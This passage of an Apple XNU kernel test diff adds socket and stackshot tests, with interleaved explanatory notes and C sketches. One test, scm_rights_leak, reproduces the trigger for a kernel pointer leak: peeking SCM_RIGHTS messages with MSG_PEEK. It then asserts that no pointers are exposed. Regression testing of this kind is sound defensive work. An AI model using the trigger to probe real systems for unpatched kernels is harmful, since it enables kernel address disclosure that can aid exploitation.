+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <sys/socket.h>
+#include <sys/un.h>
+
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <darwintest.h>
+
+#define MAX_SOCK 10
+
+T_DECL(scm_rights_leak, "test leak of file pointers by peeking SCM_RIGHTS")
+{
+       int pair[2];
+
+       T_ASSERT_POSIX_SUCCESS(socketpair(AF_UNIX, SOCK_STREAM, 0, pair),
+           NULL);
+
+       struct cmsghdr *cmsg;
+       T_ASSERT_NOTNULL(cmsg = calloc(1, CMSG_SPACE(MAX_SOCK * sizeof(int))), "calloc"); /* room for the cmsghdr plus the fd array */
+       cmsg->cmsg_len = CMSG_LEN(MAX_SOCK * sizeof(int));
+       cmsg->cmsg_level = SOL_SOCKET;
+       cmsg->cmsg_type = SCM_RIGHTS;
+
+       int *sock_fds = (int *)(void *)CMSG_DATA(cmsg);
+       for (int i = 0; i < MAX_SOCK; i++) {
+               T_ASSERT_POSIX_SUCCESS(sock_fds[i] = socket(AF_UNIX, SOCK_DGRAM, 0), NULL);
+       }
+       for (int i = 0; i < MAX_SOCK; i++) {
+               fprintf(stderr, "sock_fds[%d] %i\n", i, sock_fds[i]);
+       }
+
+       struct iovec iovec[1];
+       char data = 'x';
+       iovec[0].iov_base = &data;
+       iovec[0].iov_len = 1;
+
+       struct msghdr mh;
+       mh.msg_name = 0;
+       mh.msg_namelen = 0;
+       mh.msg_iov = iovec;
+       mh.msg_iovlen = 1;
+       mh.msg_control = cmsg;
+       mh.msg_controllen = cmsg->cmsg_len;
+       mh.msg_flags = 0;
+
+       ssize_t ssize;
+       ssize = sendmsg(pair[0], &mh, 0);
+       T_ASSERT_EQ(ssize, (ssize_t)1, "sendmsg");
+
+       struct cmsghdr *rcmsg;
+       T_ASSERT_NOTNULL(rcmsg = calloc(2048, 1), "calloc");
+
+       mh.msg_name = 0;
+       mh.msg_namelen = 0;
+       mh.msg_iov = iovec;
+       mh.msg_iovlen = 1;
+       mh.msg_control = rcmsg;
+       mh.msg_controllen = 2048;
+       mh.msg_flags = 0;
+
+       ssize = recvmsg(pair[1], &mh, MSG_PEEK);
+       T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg");
+       uintptr_t *r_ptrs = (uintptr_t *)(void *)CMSG_DATA(rcmsg);
+       socklen_t nptrs = (rcmsg->cmsg_len - CMSG_LEN(0)) / sizeof(uintptr_t);
+       for (socklen_t i = 0; i < nptrs; i++) {
+               T_EXPECT_EQ(r_ptrs[i], (uintptr_t)0, "r_ptrs[%u] 0x%lx\n", i, r_ptrs[i]);
+       }
+
+       ssize = recvmsg(pair[1], &mh, 0);
+       T_ASSERT_POSIX_SUCCESS(ssize, "recvmsg");
+       int *r_fds = (int *)(void *)CMSG_DATA(rcmsg);
+       for (int i = 0; i < MAX_SOCK; i++) {
+               T_EXPECT_NE(r_fds[i], 0, "r_fds[%d] %i\n", i, r_fds[i]);
+       }
+
+       free(cmsg);
+       free(rcmsg);
+       close(pair[0]);
+       close(pair[1]);
+}
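
The control-message sizing above follows the usual CMSG_SPACE/CMSG_LEN pattern. For reference, a self-contained sketch of the sending side is below; the 10-descriptor cap and the send_fds() name are arbitrary assumptions for the example.

/*
 * Sketch only: pass up to 10 file descriptors over a Unix-domain socket.
 * The union keeps the control buffer correctly aligned for struct cmsghdr.
 */
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

#define MAX_PASS_FDS 10

static ssize_t
send_fds(int sock, const int *fds, size_t nfds)
{
        char data = 'x';
        struct iovec iov = { .iov_base = &data, .iov_len = 1 };
        union {
                char buf[CMSG_SPACE(sizeof(int) * MAX_PASS_FDS)];
                struct cmsghdr align;
        } ctl;
        struct msghdr mh = {
                .msg_iov = &iov,
                .msg_iovlen = 1,
                .msg_control = ctl.buf,
        };
        struct cmsghdr *cm;

        if (nfds == 0 || nfds > MAX_PASS_FDS) {
                return -1;
        }
        memset(ctl.buf, 0, sizeof(ctl.buf));
        mh.msg_controllen = (socklen_t)CMSG_SPACE(sizeof(int) * nfds);
        cm = CMSG_FIRSTHDR(&mh);
        cm->cmsg_level = SOL_SOCKET;
        cm->cmsg_type = SCM_RIGHTS;
        cm->cmsg_len = (socklen_t)CMSG_LEN(sizeof(int) * nfds);
        memcpy(CMSG_DATA(cm), fds, sizeof(int) * nfds);
        return sendmsg(sock, &mh, 0);
}
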
diff --git a/tests/socket_raw_uint8_max.c b/tests/socket_raw_uint8_max.c
new file mode 100644 (file)
index 0000000..44d01c1
--- /dev/null
@@ -0,0 +1,13 @@
+#include <darwintest.h>
+#include <sys/socket.h>
+
+T_DECL(socket_raw_uint8_max, "create socket with borderline proto numbers")
+{
+       int fd = socket(AF_INET, SOCK_RAW, 256);
+
+       T_ASSERT_POSIX_FAILURE(fd, EINVAL, "socket(AF_INET, SOCK_RAW, 256);");
+
+       int fd2 = socket(AF_INET, SOCK_RAW, 255);
+
+       T_ASSERT_POSIX_SUCCESS(fd2, "socket(AF_INET, SOCK_RAW, 255);");
+}
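
The boundary in the test above comes from the IP header: the protocol field is 8 bits wide, so 255 (IPPROTO_RAW) is the largest value socket() can accept for SOCK_RAW and 256 is rejected with EINVAL. A small sketch of the same check outside the darwintest harness (raw sockets generally require root, so the first call may also fail with EPERM):

/* Sketch only: the 8-bit protocol boundary checked by the test above. */
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>

int
main(void)
{
        int ok = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); /* 255: largest valid value */
        int bad = socket(AF_INET, SOCK_RAW, 256);        /* does not fit in 8 bits */
        printf("proto 255 -> fd %d, proto 256 -> fd %d\n", ok, bad);
        return 0;
}
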
index ce904d2d8bdc5315f4bca29830b776cf905cce18..ae6aef50f77f4fd09ba33bc2f1feb874ef561dcc 100644 (file)
@@ -14,6 +14,7 @@
 #include <uuid/uuid.h>
 #include <servers/bootstrap.h>
 #include <pthread/workqueue_private.h>
+#include <dispatch/private.h>
 #import <zlib.h>
 
 T_GLOBAL_META(
@@ -46,13 +47,17 @@ static uint64_t global_flags = 0;
 #define PARSE_STACKSHOT_WAITINFO_CSEG        0x40
 #define PARSE_STACKSHOT_WAITINFO_SRP         0x80
 #define PARSE_STACKSHOT_TRANSLATED           0x100
+#define PARSE_STACKSHOT_SHAREDCACHE_FLAGS    0x200
 
 /* keys for 'extra' dictionary for parse_stackshot */
 static const NSString* zombie_child_pid_key = @"zombie_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_ZOMBIE
 static const NSString* postexec_child_unique_pid_key = @"postexec_child_unique_pid";  // -> @(unique_pid), required for PARSE_STACKSHOT_POSTEXEC
 static const NSString* cseg_expected_threadid_key = @"cseg_expected_threadid"; // -> @(tid), required for PARSE_STACKSHOT_WAITINFO_CSEG
-static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), required for PARSE_STACKSHOT_WAITINFO_SRP
+static const NSString* srp_expected_threadid_key = @"srp_expected_threadid"; // -> @(tid), this or ..._pid required for PARSE_STACKSHOT_WAITINFO_SRP
+static const NSString* srp_expected_pid_key = @"srp_expected_pid"; // -> @(pid), this or ..._threadid required for PARSE_STACKSHOT_WAITINFO_SRP
 static const NSString* translated_child_pid_key = @"translated_child_pid"; // -> @(pid), required for PARSE_STACKSHOT_TRANSLATED
+static const NSString* sharedcache_child_pid_key = @"sharedcache_child_pid"; // @(pid), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS
+static const NSString* sharedcache_child_sameaddr_key = @"sharedcache_child_sameaddr"; // @(0 or 1), required for PARSE_STACKSHOT_SHAREDCACHE_FLAGS
 
 #define TEST_STACKSHOT_QUEUE_LABEL        "houston.we.had.a.problem"
 #define TEST_STACKSHOT_QUEUE_LABEL_LENGTH sizeof(TEST_STACKSHOT_QUEUE_LABEL)
@@ -371,19 +376,18 @@ T_DECL(stress, "test that taking stackshots for 60 seconds doesn't crash the sys
                                STACKSHOT_SAVE_LOADINFO |
                                STACKSHOT_SAVE_KEXT_LOADINFO |
                                STACKSHOT_GET_GLOBAL_MEM_STATS |
-                               // STACKSHOT_GET_BOOT_PROFILE |
                                STACKSHOT_SAVE_IMP_DONATION_PIDS |
                                STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT |
                                STACKSHOT_THREAD_GROUP |
                                STACKSHOT_SAVE_JETSAM_COALITIONS |
                                STACKSHOT_ASID |
-                               // STACKSHOT_PAGE_TABLES |
                                0),
        };
 
        start_time = clock_gettime_nsec_np(CLOCK_MONOTONIC);
        while (clock_gettime_nsec_np(CLOCK_MONOTONIC) - start_time < max_diff_time) {
-               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+               take_stackshot(&scenario, false, ^(void * __unused ssbuf,
+                               size_t __unused sslen) {
                        printf(".");
                        fflush(stdout);
                });
@@ -435,6 +439,100 @@ T_DECL(dispatch_queue_label, "test that kcdata stackshots contain libdispatch qu
        dispatch_semaphore_signal(parent_done_sem);
 }
 
+#define CACHEADDR_ENV "STACKSHOT_TEST_DYLDADDR"
+T_HELPER_DECL(spawn_reslide_child, "child process to spawn with alternate slide")
+{
+       size_t shared_cache_len;
+       const void *addr, *prevaddr;
+       uintmax_t v;
+       char *endptr;
+
+       const char *cacheaddr_env = getenv(CACHEADDR_ENV);
+       T_QUIET; T_ASSERT_NOTNULL(cacheaddr_env, "getenv("CACHEADDR_ENV")");
+       errno = 0;
+       endptr = NULL;
+       v = strtoumax(cacheaddr_env, &endptr, 16);      /* read hex value */
+       T_WITH_ERRNO; T_QUIET; T_ASSERT_NE(v, 0l, "getenv(%s) = \"%s\" should be a non-zero hex number", CACHEADDR_ENV, cacheaddr_env);
+       T_QUIET; T_ASSERT_EQ(*endptr, 0, "getenv(%s) = \"%s\" endptr \"%s\" should be empty", CACHEADDR_ENV, cacheaddr_env, endptr);
+
+       prevaddr = (const void *)v;
+       addr = _dyld_get_shared_cache_range(&shared_cache_len);
+       T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address");
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(getppid(), (addr == prevaddr) ? SIGUSR2 : SIGUSR1), "signaled parent to take stackshot");
+       for (;;) {
+               (void) pause();         /* parent will kill -9 us */
+       }
+}
+
+T_DECL(shared_cache_flags, "tests stackshot's task_ss_flags for the shared cache")
+{
+       posix_spawnattr_t               attr;
+       char *env_addr;
+       char path[PATH_MAX];
+       __block bool child_same_addr = false;
+
+       uint32_t path_size = sizeof(path);
+       T_QUIET; T_ASSERT_POSIX_ZERO(_NSGetExecutablePath(path, &path_size), "_NSGetExecutablePath");
+       char *args[] = { path, "-n", "spawn_reslide_child", NULL };
+       pid_t pid;
+       size_t shared_cache_len;
+       const void *addr;
+
+       dispatch_source_t child_diffsig_src, child_samesig_src;
+       dispatch_semaphore_t child_ready_sem = dispatch_semaphore_create(0);
+       T_QUIET; T_ASSERT_NOTNULL(child_ready_sem, "shared_cache child semaphore");
+
+       dispatch_queue_t signal_processing_q = dispatch_queue_create("signal processing queue", NULL);
+       T_QUIET; T_ASSERT_NOTNULL(signal_processing_q, "signal processing queue");
+
+       signal(SIGUSR1, SIG_IGN);
+       signal(SIGUSR2, SIG_IGN);
+       child_samesig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, signal_processing_q);
+       T_QUIET; T_ASSERT_NOTNULL(child_samesig_src, "dispatch_source_create (child_samesig_src)");
+       child_diffsig_src = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR2, 0, signal_processing_q);
+       T_QUIET; T_ASSERT_NOTNULL(child_diffsig_src, "dispatch_source_create (child_diffsig_src)");
+
+       /* child signals SIGUSR2 if its shared cache address matches ours, SIGUSR1 if it differs */
+       dispatch_source_set_event_handler(child_samesig_src, ^{ child_same_addr = false; dispatch_semaphore_signal(child_ready_sem); });
+       dispatch_source_set_event_handler(child_diffsig_src, ^{ child_same_addr = true; dispatch_semaphore_signal(child_ready_sem); });
+       dispatch_activate(child_samesig_src);
+       dispatch_activate(child_diffsig_src);
+
+       addr = _dyld_get_shared_cache_range(&shared_cache_len);
+       T_QUIET; T_ASSERT_NOTNULL(addr, "shared cache address");
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(asprintf(&env_addr, "%p", addr), "asprintf of env_addr succeeded");
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(setenv(CACHEADDR_ENV, env_addr, true), "setting "CACHEADDR_ENV" to %s", env_addr);
+
+       T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_init(&attr), "posix_spawnattr_init");
+       T_QUIET; T_ASSERT_POSIX_ZERO(posix_spawnattr_setflags(&attr, _POSIX_SPAWN_RESLIDE), "posix_spawnattr_setflags");
+       int sp_ret = posix_spawn(&pid, path, NULL, &attr, args, environ);
+       T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", args[0], pid);
+
+       dispatch_semaphore_wait(child_ready_sem, DISPATCH_TIME_FOREVER);
+       T_LOG("received signal from child (%s), capturing stackshot", child_same_addr ? "same shared cache addr" : "different shared cache addr");
+
+       struct scenario scenario = {
+               .name = "shared_cache_flags",
+               .flags = (STACKSHOT_SAVE_LOADINFO | STACKSHOT_GET_GLOBAL_MEM_STATS
+                               | STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+                               | STACKSHOT_SAVE_IMP_DONATION_PIDS | STACKSHOT_KCDATA_FORMAT),
+       };
+
+       take_stackshot(&scenario, false, ^( void *ssbuf, size_t sslen) {
+               int status;
+               /* First kill the child so we can reap it */
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGKILL), "killing spawned process");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on spawned child");
+               T_QUIET; T_ASSERT_EQ(!!WIFSIGNALED(status), 1, "waitpid status should be signalled");
+               T_QUIET; T_ASSERT_EQ(WTERMSIG(status), SIGKILL, "waitpid status should be SIGKILLed");
+
+               parse_stackshot(PARSE_STACKSHOT_SHAREDCACHE_FLAGS, ssbuf, sslen, 
+                       @{sharedcache_child_pid_key: @(pid), sharedcache_child_sameaddr_key: @(child_same_addr ? 1 : 0)});
+       });
+}
+
 static void *stuck_sysctl_thread(void *arg) {
        int val = 1;
        dispatch_semaphore_t child_thread_started = *(dispatch_semaphore_t *)arg;
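
To summarize the flow above: the parent records its own shared cache base, exports it through STACKSHOT_TEST_DYLDADDR, and spawns the helper with _POSIX_SPAWN_RESLIDE; the helper compares its own base against the parent's and raises SIGUSR2 (same address) or SIGUSR1 (different) before the parent captures the stackshot. The one dyld call both sides rely on is sketched below; its prototype is an assumption taken from dyld's private header, which these tests build against.

/* Sketch only: locate the current process's shared cache mapping. */
#include <stddef.h>
#include <stdio.h>

/* Assumed prototype, normally provided by dyld's private header. */
extern const void *_dyld_get_shared_cache_range(size_t *length);

int
main(void)
{
        size_t len = 0;
        const void *base = _dyld_get_shared_cache_range(&len);
        if (base == NULL) {
                printf("no shared cache mapped\n");
                return 1;
        }
        printf("shared cache mapped at %p, %zu bytes\n", base, len);
        return 0;
}
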
@@ -1013,7 +1111,7 @@ static void stackshot_verify_current_proc_uuid_info(void **ssbuf, size_t sslen,
 T_DECL(translated, "tests translated bit is set correctly")
 {
 #if !(TARGET_OS_OSX && TARGET_CPU_ARM64)
-       T_SKIP("Not arm mac")
+       T_SKIP("Only valid on Apple silicon Macs")
 #endif
        // Get path of stackshot_translated_child helper binary
        char path[PATH_MAX];
@@ -1052,7 +1150,7 @@ T_DECL(translated, "tests translated bit is set correctly")
        struct kinfo_proc process_info;
        size_t bufsize = sizeof(process_info);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctl(mib, (unsigned)(sizeof(mib)/sizeof(int)), &process_info, &bufsize, NULL, 0), "get translated child process info");
-       T_QUIET; T_ASSERT_GT(bufsize, 0, "process info is not empty");
+       T_QUIET; T_ASSERT_GT(bufsize, (size_t)0, "process info is not empty");
        T_QUIET; T_ASSERT_TRUE((process_info.kp_proc.p_flag & P_TRANSLATED), "KERN_PROC_PID reports child is translated");
        
        T_LOG("capturing stackshot");
@@ -1064,13 +1162,14 @@ T_DECL(translated, "tests translated bit is set correctly")
        };
        
        take_stackshot(&scenario, true, ^( void *ssbuf, size_t sslen) {
-               // Kill the child
-               int status;
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child");
-               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child");
-               
                parse_stackshot(PARSE_STACKSHOT_TRANSLATED, ssbuf, sslen, @{translated_child_pid_key: @(pid)});
        });
+
+       // Kill the child
+       int status;
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(pid, SIGTERM), "kill translated child");
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(waitpid(pid, &status, 0), "waitpid on translated child");
+
 }
 
 T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always populated")
@@ -1127,7 +1226,6 @@ T_DECL(proc_uuid_info, "tests that the main binary UUID for a proc is always pop
 
 T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct waitinfo")
 {
-       int val = 1;
        struct scenario scenario = {
                .name = "cseg_waitinfo",
                .quiet = false,
@@ -1141,6 +1239,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct
        dispatch_async(dq, ^{
                pthread_threadid_np(NULL, &thread_id);
                dispatch_semaphore_signal(child_ok);
+               int val = 1;
                T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_wedge_thread", NULL, NULL, &val, sizeof(val)), "wedge child thread");
        });
 
@@ -1149,6 +1248,7 @@ T_DECL(cseg_waitinfo, "test that threads stuck in the compressor report correct
 
        T_LOG("taking stackshot");
        take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+               int val = 1;
                T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.cseg_unwedge_thread", NULL, NULL, &val, sizeof(val)), "unwedge child thread");
                parse_stackshot(PARSE_STACKSHOT_WAITINFO_CSEG, ssbuf, sslen, @{cseg_expected_threadid_key: @(thread_id)});
        });
@@ -1274,6 +1374,42 @@ T_HELPER_DECL(srp_client,
        T_LOG("client process exiting after sending message to parent (server)");
 }
 
+enum srp_test_type {
+       SRP_TEST_THREAD,        /* expect waiter on current thread */
+       SRP_TEST_PID,           /* expect waiter on current PID */
+       SRP_TEST_EITHER,        /* waiter could be on either */
+};
+
+static void
+check_srp_test(const char *name, enum srp_test_type ty)
+{
+       struct scenario scenario = {
+               .name = name,
+               .quiet = false,
+               .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT),
+       };
+       uint64_t thread_id = 0;
+       pthread_threadid_np(NULL, &thread_id);
+       if (ty == SRP_TEST_THREAD) {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_threadid_key: @(thread_id)});
+               });
+       } else if (ty == SRP_TEST_PID) {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_pid_key: @(getpid())});
+               });
+       } else {
+               take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
+                       parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
+                                       @{srp_expected_pid_key: @(getpid()), srp_expected_threadid_key: @(thread_id)});
+               });
+       }
+
+}
+
+
 /*
  * Tests the stackshot wait info plumbing for synchronous IPC that doesn't use kevent on the server.
  *
@@ -1285,11 +1421,14 @@ T_HELPER_DECL(srp_client,
  *           to a server that receives the message and copies in the send-once right, but doesn't
  *           reply to the client. for this case the special reply port is copied out and the kernel
  *           stashes the info about which task copied out the send once right. (rdar://60440592)
+ * (part 3): tests the same as part 2, but uses kevents, which allow for
+ *           priority inheritance
  */
 T_DECL(special_reply_port, "test that tasks using special reply ports have correct waitinfo")
 {
        dispatch_semaphore_t can_continue  = dispatch_semaphore_create(0);
        dispatch_queue_t dq = dispatch_queue_create("signalqueue", NULL);
+       dispatch_queue_t machdq = dispatch_queue_create("machqueue", NULL);
        dispatch_source_t sig_src;
        char path[PATH_MAX];
        uint32_t path_size = sizeof(path);
@@ -1298,11 +1437,6 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
        pid_t client_pid;
        int sp_ret;
        kern_return_t kr;
-       struct scenario scenario = {
-               .name = "srp",
-               .quiet = false,
-               .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT),
-       };
        mach_port_t port;
 
        /* setup the signal handler in the parent (server) */
@@ -1328,18 +1462,20 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
        dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
        T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear");
 
+       /*
+        * can_continue indicates the client has signaled us, but we want to make
+        * sure they've actually blocked sending their mach message.  It's cheesy, but
+        * sleep() works for this.
+        */
        sleep(1);
 
        /*
         * take the stackshot without calling receive to verify that the stackshot wait
-        * info shows our (the server) PID for the scenario where the server has yet to
+        * info shows our (the server) thread for the scenario where the server has yet to
         * receive the message.
         */
        T_LOG("Taking stackshot for part 1 coverage");
-       take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
-               parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
-                               @{srp_expected_pid_key: @(getpid())});
-       });
+       check_srp_test("srp", SRP_TEST_THREAD);
 
        /*
         * receive the message from the client (which should copy the send once right into
@@ -1375,17 +1511,55 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
         * for the scenario where the server has received the message and copied in the send-once right.
         */
        T_LOG("Taking stackshot for part 2 coverage");
-       take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
-               parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
-                               @{srp_expected_pid_key: @(getpid())});
-       });
+       check_srp_test("srp", SRP_TEST_PID);
 
        /* cleanup - kill the client */
-       T_LOG("killing client");
-       kill(client_pid, SIGKILL);
+       T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client");
+       T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit");
+
+       // do it again, but using kevents
+       T_LOG("Launching client");
+       sp_ret = posix_spawn(&client_pid, client_args[0], NULL, NULL, client_args, NULL);
+       T_QUIET; T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", client_args[0], client_pid);
+       T_LOG("Spawned client as PID %d", client_pid);
 
-       T_LOG("waiting for the client to exit");
-       waitpid(client_pid, NULL, 0);
+       dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
+       T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear");
+
+       /*
+        * can_continue indicates the client has signaled us, but we want to make
+        * sure they've actually blocked sending their mach message.  It's cheesy, but
+        * sleep() works for this.
+        */
+       sleep(1);
+
+       dispatch_mach_t dispatch_mach = dispatch_mach_create(SRP_SERVICE_NAME, machdq, 
+           ^(dispatch_mach_reason_t reason,
+             dispatch_mach_msg_t message,
+             mach_error_t error __unused) {
+               switch (reason) {
+               case DISPATCH_MACH_MESSAGE_RECEIVED: {
+                       size_t size = 0;
+                       mach_msg_header_t *msg __unused = dispatch_mach_msg_get_msg(message, &size);
+                       T_LOG("server: received %zu-byte message", size);
+                       check_srp_test("turnstile_port_thread", SRP_TEST_THREAD);
+                       T_LOG("server: letting client go");
+                       // drop the message on the ground, we'll kill the client later
+                       dispatch_semaphore_signal(can_continue);
+                       break;
+               }
+               default:
+                       break;
+               }
+       });
+
+       dispatch_mach_connect(dispatch_mach, port, MACH_PORT_NULL, NULL);
+
+       dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
+
+       /* cleanup - kill the client */
+       T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client");
+       T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit");
 }
 
 #pragma mark performance tests
@@ -1441,7 +1615,7 @@ stackshot_flag_perf_noclobber(uint64_t flag, char *flagname)
 
        dt_stat_t duration = dt_stat_create("nanoseconds per thread", "%s_duration", flagname);
        dt_stat_t size = dt_stat_create("bytes per thread", "%s_size", flagname);
-       T_LOG("Testing \"%s\" = 0x%x", flagname, flag);
+       T_LOG("Testing \"%s\" = 0x%" PRIx64, flagname, flag);
 
        while (!dt_stat_stable(duration) || !dt_stat_stable(size)) {
                take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
@@ -1692,6 +1866,7 @@ static void
 parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSDictionary *extra)
 {
        bool delta = (stackshot_parsing_flags & PARSE_STACKSHOT_DELTA);
+       bool expect_sharedcache_child = (stackshot_parsing_flags & PARSE_STACKSHOT_SHAREDCACHE_FLAGS);
        bool expect_zombie_child = (stackshot_parsing_flags & PARSE_STACKSHOT_ZOMBIE);
        bool expect_postexec_child = (stackshot_parsing_flags & PARSE_STACKSHOT_POSTEXEC);
        bool expect_cseg_waitinfo = (stackshot_parsing_flags & PARSE_STACKSHOT_WAITINFO_CSEG);
@@ -1705,9 +1880,13 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
        bool found_translated_child = false;
        bool found_dispatch_queue_label = false, found_turnstile_lock = false;
        bool found_cseg_waitinfo = false, found_srp_waitinfo = false;
-       pid_t zombie_child_pid = -1, srp_expected_pid = 0;
+       bool found_sharedcache_child = false, found_sharedcache_badflags = false, found_sharedcache_self = false;
+       uint64_t srp_expected_threadid = 0;
+       pid_t zombie_child_pid = -1, srp_expected_pid = -1, sharedcache_child_pid = -1;
        pid_t translated_child_pid = -1;
+       bool sharedcache_child_sameaddr = false;
        uint64_t postexec_child_unique_pid = 0, cseg_expected_threadid = 0;
+       uint64_t sharedcache_child_flags = 0, sharedcache_self_flags = 0;
        char *inflatedBufferBase = NULL;
 
        if (expect_shared_cache_uuid) {
@@ -1732,6 +1911,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                }
        }
 
+       if (expect_sharedcache_child) {
+               NSNumber* pid_num = extra[sharedcache_child_pid_key];
+               NSNumber* sameaddr_num = extra[sharedcache_child_sameaddr_key];
+               T_QUIET; T_ASSERT_NOTNULL(pid_num, "sharedcache child pid provided");
+               T_QUIET; T_ASSERT_NOTNULL(sameaddr_num, "sharedcache child addrsame provided");
+               sharedcache_child_pid = [pid_num intValue];
+               T_QUIET; T_ASSERT_GT(sharedcache_child_pid, 0, "sharedcache child pid greater than zero");
+               sharedcache_child_sameaddr = [sameaddr_num intValue];
+               T_QUIET; T_ASSERT_GE([sameaddr_num intValue], 0, "sharedcache child sameaddr is boolean (0 or 1)");
+               T_QUIET; T_ASSERT_LE([sameaddr_num intValue], 1, "sharedcache child sameaddr is boolean (0 or 1)");
+       }
        if (expect_zombie_child) {
                NSNumber* pid_num = extra[zombie_child_pid_key];
                T_QUIET; T_ASSERT_NOTNULL(pid_num, "zombie child pid provided");
@@ -1749,15 +1939,23 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
        if (expect_cseg_waitinfo) {
                NSNumber* tid_num = extra[cseg_expected_threadid_key];
                T_QUIET; T_ASSERT_NOTNULL(tid_num, "cseg's expected thread id provided");
-               cseg_expected_threadid = [tid_num intValue];
-               T_QUIET; T_ASSERT_GT(cseg_expected_threadid, 0, "cseg_expected_threadid greater than zero");
+               cseg_expected_threadid = tid_num.unsignedLongValue;
+               T_QUIET; T_ASSERT_GT(cseg_expected_threadid, UINT64_C(0), "compressor segment thread is present");
        }
 
        if (expect_srp_waitinfo) {
+               NSNumber* threadid_num = extra[srp_expected_threadid_key];
                NSNumber* pid_num = extra[srp_expected_pid_key];
-               T_QUIET; T_ASSERT_NOTNULL(pid_num, "expected SRP pid provided");
-               srp_expected_pid  = [pid_num intValue];
-               T_QUIET; T_ASSERT_GT(srp_expected_pid , 0, "srp_expected_pid greater than zero");
+               T_QUIET; T_ASSERT_TRUE(threadid_num != nil || pid_num != nil, "expected SRP threadid or pid");
+               if (threadid_num != nil) {
+                       srp_expected_threadid = [threadid_num unsignedLongLongValue];
+                       T_QUIET; T_ASSERT_GT(srp_expected_threadid, 0ull, "srp_expected_threadid greater than zero");
+               }
+               if (pid_num != nil) {
+                       srp_expected_pid = [pid_num intValue];
+                       T_QUIET; T_ASSERT_GT(srp_expected_pid, 0, "srp_expected_pid greater than zero");
+               }
+               T_LOG("looking for SRP pid: %d threadid: %llu", srp_expected_pid, srp_expected_threadid);
        }
 
        if (expect_translated_child) {
@@ -1766,7 +1964,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                translated_child_pid = [pid_num intValue];
